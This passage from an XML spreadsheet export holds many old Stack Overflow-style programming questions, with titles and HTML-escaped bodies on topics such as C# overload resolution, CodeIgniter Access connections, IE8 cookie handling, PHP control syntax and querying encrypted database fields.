    <t xml:space="preserve">&lt;p&gt;Trying to use an excpetion class which could provide location reference for XML parsing, found an interesting behavior - compiler could not choose between overload which consumes an interface and one which needs System.Exception when I trying to pass XmlReader as a parameter.&lt;/p&gt;
&lt;p&gt;Detais are following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//exception overloads:
public FilterXmlParseException(string message, Exception innerException)
		: base(message, innerException) { }
public FilterXmlParseException(string message, IXmlLineInfo lineInfo) {...}
//Usage:
XmlReader reader = ...
IXmlLineInfo lineinfo = (IXmlLineInfo)reader;
//fails
throw new FilterXmlParseException("&amp;lt;Filter&amp;gt; element expected", reader);
//ok
throw new FilterXmlParseException("&amp;lt;Filter&amp;gt; element expected", lineinfo);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And it fails since it could not select correct overload.But why? We see that XmlReader supports an interface and it is not inherited from System.Exception&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I add an MSAccess connection to CodeIgniter or CakePHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use a Microsoft Access database for a demo project that I'm thinking of doing in either CodeIgniter or CakePHP. Ignoring the possible folly of using Microsoft Access, I haven't been able to figure out precisely how the connection string corresponds to the frameworks' database settings. In straight PHP, I can use this code to connect to an Access database:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$db_connection = odbc_connect(
  "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=\\path\\to\\db.mdb", 
  "ADODB.Connection", "", "SQL_CUR_USE_ODBC"
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do those strings correspond to the Code Igniter db settings? This doesn't seem to be quite working:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$db['access']['hostname'] = "{Microsoft Access Driver (*.mdb)}";
$db['access']['username'] = "ADODB.Connection";
$db['access']['password'] = "";
$db['access']['database'] = "\\path\\to\\db.mdb";
$db['access']['dbdriver'] = "odbc";
$db['access']['dbprefix'] = "";
$db['access']['pconnect'] = TRUE;
$db['access']['db_debug'] = TRUE;
$db['access']['cache_on'] = FALSE;
$db['access']['cachedir'] = "";
$db['access']['char_set'] = "utf8";
$db['access']['dbcollat'] = "utf8_general_ci";
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I find out when the Spring.NET root context has loaded?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web service running, and it uses Spring.NET for it's IoCness.  One of the classes needs to do some stuff when it loads (I'm using &lt;code&gt;AfterPropertiesSet&lt;/code&gt;) and "some stuff" involves a call to &lt;code&gt;ContextRegistry.GetContext()&lt;/code&gt;.  The problem is this code in the &lt;code&gt;ContextRegistry&lt;/code&gt; class:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (rootContextCurrentlyInCreation)
{
    throw new InvalidOperationException("root context is currently in creation. You must not call ContextRegistry.GetContext() from e.g. constructors of your singleton objects");    
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I have that object register itself to be notified once the context is fully created?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IE8 loses cookies when opening a new window after a redirect</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Internet Explorer 8 beta 2.  &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Client performs POST on &lt;a href="http://alpha/foo"&gt;http://alpha/foo&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Server responds with redirect to &lt;a href="http://beta/bar"&gt;http://beta/bar&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Client performs GET on &lt;a href="http://beta/bar"&gt;http://beta/bar&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Server responds with redirect to &lt;a href="http://beta/baz"&gt;http://beta/baz&lt;/a&gt; and sets cookie&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Client performs GET on &lt;a href="http://beta/baz"&gt;http://beta/baz&lt;/a&gt; &lt;em&gt;including cookie&lt;/em&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Server provides response&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;User selects "Open in new window" on a link in the page&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Client performs GET on &lt;a href="http://beta/link"&gt;http://beta/link&lt;/a&gt;, &lt;em&gt;without cookie!&lt;/em&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If in step 7 the user just clicks the link, the cookie &lt;em&gt;is&lt;/em&gt; passed correctly.  If there is no redirect, the cookie is passed correctly even if the user selects "Open in new window".&lt;/p&gt;
&lt;p&gt;Is there a way to convince IE8 to pass the cookie in step 8?&lt;/p&gt;
&lt;p&gt;(Edit: I believe this is a bug in IE8 beta 2, so I've &lt;a href="http://www.microsoft.com/communities/newsgroups/list/en-us/default.aspx?mid=f90dfed8-42e3-499a-9a0b-4eefa66efccc&amp;amp;dg=microsoft.public.internetexplorer.beta"&gt;raised it on the IE beta newsgroup&lt;/a&gt;.  Workaround suggestions welcome.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Correct behavior for interface methods that can't be implemented</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I have a class that needs to implement an interface but one or more of the methods on that interface don't make sense in the context of this particular class, what should I do?&lt;/p&gt;
&lt;p&gt;For example, lets say I'm implementing an adapter pattern where I want to create a wrapper class that implements &lt;a href="http://java.sun.com/javase/6/docs/api/java/util/Map.html" rel="nofollow"&gt;java.util.Map&lt;/a&gt; by wrapping some immutable object and exposing it's data as key/value pairs.  In this case the methods put and putAll don't make sense as I have no way to modify the underlying object.  So the question is what should those methods do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating local users on remote windows server using c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Provided I have admin access, I need a way to manage (Create, modify, remove) local accounts in a remote machine from an ASP.NET client.&lt;/p&gt;
&lt;p&gt;I'm clueless in how to approach this. Is WMI a possibility (System.Management namespace)?
Any pointers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Isn't saying "C/C++" wrong?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've seen a lot of questions around that use improperly the expression "C/C++".
The reasons in my opinion are: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Newbie C and C++ programmers probably don't understand the difference between the two languages.&lt;/li&gt;
&lt;li&gt;People don't really care about it since they want a generic, quick and "dirty" answer&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;While C/C++ could sometimes be interpreted as "either C or C++", I think it's a big error. C and C++ offer different approaches to programming, and even if C code can be easily implemented into C++ programs I think that referring to two separate languages with that single expression ( C/C++ ) is wrong.&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;It's true that some questions can be considered either as C or C++ ones, anyway. 
What do you think about it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS - Is there a way to get rid of the selection rectangle after clicking a link?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to get rid of the selection rectangle when clicking a link which does not refresh the current page entirely?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can you make use of the add-in framework in .NET 3.0?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are some updates with .NET 3.0 concerning how to create and use add-ins for your own applications. I read about some "&lt;em&gt;pipeline&lt;/em&gt;" you have to create for the communication between add-in and host-application but couldn't find further information about it.&lt;/p&gt;
&lt;p&gt;How would you made an add-in functionality in an application with .NET 3.0/3.5?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Additional information if necessary&lt;/strong&gt;: The host application is made with WPF and some general functionality. Each add-in should add a own register-tab to a given container with their own content (buttons, textfields, ...) and methods to extend the host-application.&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Would you use C++/CLI if supported like C# &amp; VB.NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've always had a thing for C++/CLI. Maybe because not many developers use it... or just because it's different.&lt;/p&gt;
&lt;p&gt;Suppose Microsoft fully supported C++/CLI as they do VB.NET and C# (ie. LINQ, WPF, etc.). Would you use it? &lt;/p&gt;
&lt;p&gt;If not, why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get the name of a class as a string in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to take a class name and convert it to a string in C#? &lt;/p&gt;
&lt;p&gt;As part of the Entity Framework, the .Include method takes in a dot-delimited list of strings to join on when performing a query. I have the class model of what I want to join, and for reasons of refactoring and future code maintenance, I want to be able to have compile-time safety when referencing this class.&lt;/p&gt;
&lt;p&gt;Thus, is there a way that I could do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Foo
{
}
tblBar.Include ( Foo.GetType().ToString() );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don't think I can do GetType() without an instance. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>is there something like alternate data streams on any linux filesystem?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On Windows NTFS there is a nice but mostly unused feature called 
"Alternate Data Streams" (ADS) which I recently used in a hobby-dev project.&lt;/p&gt;
&lt;p&gt;On Mac HFS+ there is also a similarly nice but mostly unused feature called "named forks".&lt;/p&gt;
&lt;p&gt;I am thinking of porting this project to Linux, but I do not know if any Filesystem on linux has such a feature?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Integrating with Great Plains, best way?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can't find much information around the web about it. Has anyone used both eConnect and the Dynamics web services to interact (read/write) with Great Plains. I am looking for the pros and cons of both approaches.&lt;/p&gt;
&lt;p&gt;This product will be installed and configured on various sites, so ease of configuration is really important. I usually hate to mess with IIS.&lt;/p&gt;
&lt;p&gt;Should be able to target GP 9 and 10.&lt;/p&gt;
&lt;p&gt;Thank you&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem with width of auto-generated columns in DataGrid</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Maybe world peace would be easier, but I have a problem with the widths of auto generated columns when a DataGrid has no rows.  The column headings all squeeze up with no spacing between them.  I've tried adding the following CSS to no avail:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;td.gridHeader
{
  padding-left:20px;
  padding-right: 20px;        
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Convert UTC/GMT time to local time</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are developing a C# application for a web-service client. This will run on Windows XP PC's.&lt;/p&gt;
&lt;p&gt;One of the fields returned by the web service is a DateTime field. The server returns a field in GMT format i.e. with a "Z" at the end.&lt;/p&gt;
&lt;p&gt;However, we found that .NET seems to do some kind of implicit conversion and the time was always 12 hours out.&lt;/p&gt;
&lt;p&gt;The following code sample resolves this to some extent in that the 12 hour difference has gone but it makes no allowance for NZ daylight saving.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CultureInfo ci = new CultureInfo("en-NZ");
string date = "Web service date".ToString("R", ci);
DateTime convertedDate = DateTime.Parse(date);            
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As per &lt;a href="http://www.timeanddate.com/worldclock/city.html?n=22"&gt;this date site&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;UTC/GMT Offset &lt;/p&gt;
  &lt;p&gt;Standard time zone: UTC/GMT +12 hours&lt;br&gt;
  Daylight saving time: +1 hour&lt;br&gt;
  Current time zone offset: &lt;strong&gt;UTC/GMT +13 hours&lt;/strong&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How do we adjust for the extra hour? Can this be done programmatically or is this some kind of setting on the PC's?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I find out when a picture was actually taken in C# running on Vista?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In windows XP "FileInfo.LastWriteTime" will return the date a picture is taken - regardless of how many times the file is moved around in the filesystem.&lt;/p&gt;
&lt;p&gt;In Vista it instead returns the date that the picture is copied from the camera.&lt;/p&gt;
&lt;p&gt;How can I find out when a picture is taken in Vista? In windows explorer this field is referred to as "Date Taken".&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Editing tables with MSHTML</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to create/edit a table using MSHTML without resorting to editing the underlying HTML?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Designer errors, when there are no errors</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I get errors when viewing forms and there are not any.  I can close VS and reopen and it is fine.  What cases this?  Can it be fixed without closing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the limits of ruby on rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a memory of talking to people who have got so far in using Ruby on Rails and then had to abandon it when they have hit limits, or found it was ultimately too rigid.  I forget the details but it may have had to do with using more than one database.&lt;/p&gt;
&lt;p&gt;So what I'd like is to know is what features/requirements fall outside of Ruby on Rails, or at least requires such contortions that it is better to use another more flexible framework, even though you may have to lose some elegance or write extra boilerplate code.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are C++ Templates just Macros in disguise?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been programming in C++ for a few years, and I've used STL quite a bit and have created my own template classes a few times to see how it's done.&lt;/p&gt;
&lt;p&gt;Now I'm trying to integrate templates deeper into my OO design, and a nagging thought keeps coming back to me: They're just a macros, really... You could implement (rather UGLY) auto_ptrs using #defines, if you really wanted to.&lt;/p&gt;
&lt;p&gt;This way of thinking about templates helps me understand how my code will actually work, but I feel that I must be missing the point somehow. Macros are meant evil incarnate, yet "template metaprogramming" is all the rage.&lt;/p&gt;
&lt;p&gt;So, what ARE the real distinctions? and how can templates avoid the dangers that #define leads you into, like&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Inscrutable compiler errors in
places where you don't expect them?&lt;/li&gt;
&lt;li&gt;Code bloat? &lt;/li&gt;
&lt;li&gt;Difficulty in tracing code?&lt;/li&gt;
&lt;li&gt;Setting Debugger Breakpoints?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Obtain file path of C# save dialog box</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a save dialog box which pops up when i press a button. However i dont want to save a file at that point, i want to take the name and place it in the text box next to the button, for the name to be used later. &lt;/p&gt;
&lt;p&gt;Can anybody tell me how to obtain the file path from the save dialog box to use it later?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to display DateTime with an abbreviated Time Zone?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am aware of the &lt;a href="http://msdn.microsoft.com/en-us/library/system.timezone(VS.80).aspx"&gt;System.TimeZone&lt;/a&gt; class as well as the many uses of the &lt;a href="http://msdn.microsoft.com/en-us/library/system.datetime.tostring(VS.80).aspx"&gt;DateTime.ToString()&lt;/a&gt; method.  What I haven't been able to find is a way to convert a DateTime to a string that, in addition to the time and date info, contains the three-letter Time Zone abbreviation (in fact, much the same way StackOverflow's tooltips for relative time display works).&lt;/p&gt;
&lt;p&gt;To make an example easy for everyone to follow as well as consume, let's continue with the StackOverflow example.  If you look at the tooltip that displays on relative times, it displays with the full date, the time including seconds in twelve-hour format, an AM/PM designation, and then the three-letter Time Zone abbreviation (in their case, Coordinated Universal Time).  I realize I could easily get GMT or UTC by using the built-in methods, but what I really want is the time as it is locally &amp;mdash; in this case, on a web server.&lt;/p&gt;
&lt;p&gt;If our web server is running Windows Server 2k3 and has it's time zone set to CST (or, until &lt;a href="http://en.wikipedia.org/wiki/Daylight_saving_time#Terminology"&gt;daylight saving&lt;/a&gt; switches back, CDT is it?), I'd like our ASP.NET web app to display DateTimes relative to that time zone as well as formatted to display a "CST" on the end.  I realize I could easily hard-code this, but in the interest of robustness, I'd really prefer a solution based on the server running the code's OS environment settings.&lt;/p&gt;
&lt;p&gt;Right now, I have everything but the time zone abbreviation using the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;myDateTime.ToString("MM/dd/yyyy hh:mm:ss tt")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which displays:&lt;/p&gt;
&lt;p&gt;10/07/2008 03:40:31 PM&lt;/p&gt;
&lt;p&gt;All I want (and it's not much, promise!) is for it to say:&lt;/p&gt;
&lt;p&gt;10/07/2008 03:40:31 PM CDT&lt;/p&gt;
&lt;p&gt;I can use System.TimeZone.CurrentTimeZone and use it to correctly display "Central Daylight Time" but... that's a bit too long for brevity's sake.  Am I then stuck writing a string manipulation routine to strip out white-space and any non-uppercase letters?  While that might work, that seems incredibly hack to me...&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.google.com/search?hl=en&amp;amp;safe=off&amp;amp;q=C%23+time+zone+abbreviation&amp;amp;btnG=Search"&gt;Googling&lt;/a&gt; and looking around on here did not produce anything applicable to my specific question.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mixed syntax for control structures generating syntax errors</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm refactoring some PHP code and discovered that certain nested combinations of &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if () :
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if () {
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;generate syntax errors.  Not that I would normally mix the two, but I like to do frequent syntax checks as I'm writing code and I kept getting a syntax error because of this.&lt;/p&gt;
&lt;p&gt;Example - generates syntax error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if ( $test == 1 ) :
  if ( $test2 == 'a' ) {
    if ( $test3 == 'A' ) {
    } else {
    }
  }
else :
  echo 'test2';
endif;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Example - does NOT generate syntax error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if ( $test == 1 ) :
  if ( $test2 == 'a' ) :
    if ( $test3 == 'A' ) :
    else :
    endif;
  endif;
else :
  echo 'test2';
endif;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Could someone please explain to me why the first block of code is generating an error? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you deal with connection strings when deploying an ASP.NET site?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Right now our test and production databases are on the same server, but with different names.  Deploying has meant editing Web.config to change all the connection strings for the correct database.  A step which I forget all too frequently... &lt;/p&gt;
&lt;p&gt;We've finally created a new database server for testing, and I'm moving the databases over... but now the server will be different and we'll still need to deal with connection string issues.  &lt;/p&gt;
&lt;p&gt;I was thinking of managing it via a hosts file, but the thought of switching that on my desktop machine whenever I need to test against production data seems cumbersome at best.&lt;/p&gt;
&lt;p&gt;So I'm just wondering if there's a better way out there.  Something that would build with a "production" web config for deployment would be ideal...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a master list of the Big-O notation for everything?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a master list of the Big-O notation for everything? Data structures, algorithms, operations performed on each, average-case, worst-case, etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Office Ribbon in a Word Processor</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I heard Microsoft allows use of commercially available Office UI controls, with the exception of competing products, such as a word processor or spreadsheet app, etc.&lt;/p&gt;
&lt;p&gt;How true is that?&lt;/p&gt;
&lt;p&gt;Also, if it is not true, do you know of any &lt;em&gt;free&lt;/em&gt; Ribbon controls?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Doesn't the ability to cast defeat the purpose of typed variables?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, I'm working under the assumption that we have typed languages because we make a lot of mistakes... so typing is one way to have the compiler do a lot of checks for us and help us out a bit (please let me know if it is my assumptions that's incorrect).&lt;/p&gt;
&lt;p&gt;However, if we introduce casting to a typed language, don't we re-introduce most the problems we had when were not able to type variables?&lt;/p&gt;
&lt;p&gt;I'm also aware that my assumption isn't the only reason why we type variables. Please share some of the other reasons why we have typed languages.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>string symbol manipulation in batch files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to take substrings of a string with .bat/.cmd files?&lt;/p&gt;
&lt;p&gt;For example given the string "hello.txt" is there a way to strip the .txt?&lt;/p&gt;
&lt;p&gt;EDIT: Also is there a more general way to do this, not under the assumption that it is a file name or file path?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Makefile If-Then Else and Loops</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can someone explain how to use if-then statements and for loops in Makefiles? I can't seem to find any good documentation with examples.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>asp.net output data from DB without any html markup</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm new to jquery and asp.net so please forgive if this is an obvious question. I'm using a jquery autocomplete plugin which requires that the page it looks up asynchronously for data is in this format as pure text only:&lt;/p&gt;
&lt;p&gt;product1|price1&lt;br&gt;
product2|price2&lt;br&gt;
product3|price3&lt;/p&gt;
&lt;p&gt;WITHOUT ANY OTHER HTML MARKUP. Any other html tags seems to cause problems. 
Normally for a page like that I would use a repeater and some standard database calls and output the 2 fields. This however creates html tags.&lt;/p&gt;
&lt;p&gt;How can I output this data as text only with no other markup whatsoever?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CString maximum length</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the maximum length in characters a CString object can hold?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best encryption library in C/C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best encryption library in C/C++ In terms of: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;entropy  &lt;/li&gt;
&lt;li&gt;quality &lt;/li&gt;
&lt;li&gt;ease of use&lt;/li&gt;
&lt;li&gt;readability&lt;/li&gt;
&lt;li&gt;portability &lt;/li&gt;
&lt;li&gt;performance&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What's your favorite and why do you like it? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I change read/write mode for a file using Emacs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If a file is set to read only mode, how do I change it to write mode and vice versa from within Emacs?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Object Initializer syntax to produce correct Json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am attempting to use linq to shape list of data into a particular shape to be returned as Json from an ajax call.&lt;/p&gt;
&lt;p&gt;Given this data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var data = new List&amp;lt;string&amp;gt;();
data.Add("One");
data.Add("Two");
data.Add("Three");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And this code: ** Which is not correct and is what needs to be fixed!! **&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var shaped = data.Select(c =&amp;gt;
    new { c = c }
).ToList();
serializer.Serialize(shaped,sb);
string desiredResult = sb.ToString();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like &lt;code&gt;desiredResult&lt;/code&gt; to be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
    "One": "One",
    "Two": "Two",
    "Three": "Three"
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but it is currently:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;{ "c" : "One" },{ "c" : "Two" }&lt;/code&gt;, etc. &lt;/p&gt;
&lt;p&gt;One problem is that on the left side of the object initializer I want the value of &lt;code&gt;c&lt;/code&gt;, not &lt;code&gt;c&lt;/code&gt; itself...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you allocate a very large single chunk of memory ( &gt; 4GB ) in c or c++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;With very large amounts of ram these days I was wondering, it is possible to allocate a single chunk of memory that is larger than 4GB? Or would I need to allocate a bunch of smaller chunks and handle switching between them?&lt;/p&gt;
&lt;p&gt;Why???
I'm working on processing some openstreetmap xml data and these files are huge. I'm currently streaming them in since I can't load them all in one chunk but I just got curious about the upper limits on malloc or new. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to add full web search to my site?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to add full web search to my site. I need something like Google Custom Search but with no ads and it has to be free. Any recommendation of a web service or open source project that can index my site and allow me to search it will be helpful.&lt;/p&gt;
&lt;p&gt;My site is made in ruby on rails, if that helps.&lt;/p&gt;
&lt;p&gt;I'll make this question community-wiki so you can edit my bad English. I think many people can benefit from this question.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I cache a calculated column in rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a tree of active record objects, something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Part &amp;lt; ActiveRecord::Base
  has_many :sub_parts, :class_name =&amp;gt; "Part"
  def complicated_calculation
    if sub_parts.size &amp;gt; 0
      return self.sub_parts.inject(0){ |sum, current| sum + current.complicated_calculation }
    else
      sleep(1)
      return rand(10000)
    end
  end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It is too costly to recalculate the complicated_calculation each time. So, I need a way to cache the value. However, if any part is changed, it needs to invalidate its cache and the cache of its parent, and grandparent, etc.&lt;/p&gt;
&lt;p&gt;As a rough draft, I created a column to hold the cached calculation in the "parts" table, but this smells a little rotten. It seems like there should be a cleaner way to cache the calculated values without stuffing them along side the "real" columns.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Encrypted database query</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've just found out about Stack Overflow and I'm just checking if there are ideas for a constraint I'm having with some friends in a project, though this is more of a theoretical question to which I've been trying to find an answer for some time.&lt;/p&gt;
&lt;p&gt;I'm not much given into cryptography but if I'm not clear enough I'll try to edit/comment to clarify any questions.&lt;/p&gt;
&lt;p&gt;Trying to be brief, the environment is something like this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;An application where the front-end as access to encrypt/decrypt keys and the back-end is just used for storage and queries.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Having a database to which you can't have access for a couple of fields for example let's say "address" which is text/varchar as usual.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;You don't have access to the key for decrypting the information, and all information arrives to the database already encrypted.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The main problem is something like this, how to consistently make queries on the database, it's impossible to do stuff like "where address like '%FÂ§YU/Â´~#JKSks23%'". (IF there is anyone  feeling with an answer for this feel free to shoot it).&lt;/p&gt;
&lt;p&gt;But is it ok to do &lt;code&gt;where address='Â±!NNsj3~^Âº-:'&lt;/code&gt;? Or would it also completely eat up the database? &lt;/p&gt;
&lt;p&gt;Another restrain that might apply is that the front end doesn't have much processing power available, so already encrypting/decrypting information starts to push it to its limits. (Saying this just to avoid replies like "Exporting a join of tables to the front end and query it there".)&lt;/p&gt;
&lt;p&gt;Could someone point me in a direction to keep thinking about it?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Well thanks for so fast replies at 4 AM, for a first time usage I'm really feeling impressed with this community. (Or maybe I'm it's just for the different time zone)&lt;/p&gt;
&lt;p&gt;Just feeding some information:&lt;/p&gt;
&lt;p&gt;The main problem is all around partial matching. As a mandatory requirement in most databases is to allow partial matches. The main constraint is actually &lt;strong&gt;the database owner would not be allowed to look inside the database for information&lt;/strong&gt;. During the last 10 minutes I've come up with a possible solution which extends again to possible database problems, to which I'll add here:&lt;/p&gt;
&lt;p&gt;Possible solution to allow semi partial matching:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The password + a couple of public fields of the user are actually the key for encrypting. For authentication the idea is to encrypt a static value and compare it within the database.&lt;/li&gt;
&lt;li&gt;Creating a new set of tables where information is stored in a parsed way, meaning something like: "4th Street" would become 2 encrypted rows (one for '4th' another for 'Street'). This would already allow semi-partial matching as a search could already be performed on the separate tables.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;New question:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Would this probably eat up the database server again, or does anyone think it is a viable solution for the partial matching problem?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;Post Scriptum: I've unaccepted the answer from Cade Roux just to allow for further discussion and specially a possible answer to the new question.&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Database Null</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an asp.net text form that contains numerous decimal fields that are optional. I want to selectively update the database but not inserting a "0" for fields that do not have data (maintaining the null status). &lt;/p&gt;
&lt;p&gt;Typically, I would create multiple functions, each with a different signature to handle this. However, I am inserting the data through a webservice which does not allow a function with the same name to have multiple signatures. I can think of a couple ways to work around this, but none "pragmatically".&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Delphi Project Needing runtime Packages, even with runtime Packages off</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My Delphi7 project will not run on my clients computer if i don't have a few of the runtime packages in the path. eg rtl70.bpl&lt;/p&gt;
